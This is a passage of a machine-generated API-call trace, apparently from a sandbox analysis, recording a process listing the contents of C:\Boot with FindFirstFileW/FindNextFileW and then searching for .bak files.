(in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0155.851] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0155.851] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0155.852] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7898476d, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0155.852] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0155.852] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0155.852] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0155.852] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0155.853] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0155.853] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0155.853] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0155.853] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0155.853] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0155.854] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-MX", cAlternateFileName="")) returned 1 [0155.854] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0155.854] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0155.854] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0155.854] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0155.855] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0155.855] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0155.855] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0155.855] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0155.855] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0155.856] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0155.856] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0155.856] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0155.856] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2960, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0155.856] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0155.856] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0155.857] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0155.857] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0155.857] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0155.857] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0155.857] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0155.858] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0155.858] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0155.858] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0155.858] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0155.859] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0155.859] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0155.859] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0155.859] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0155.859] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0155.860] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a8f7b9, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0155.860] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0155.860] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0155.860] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0155.860] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0155.861] FindFirstFileW (in: lpFileName="C:\\Boot\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0155.906] FindFirstFileW 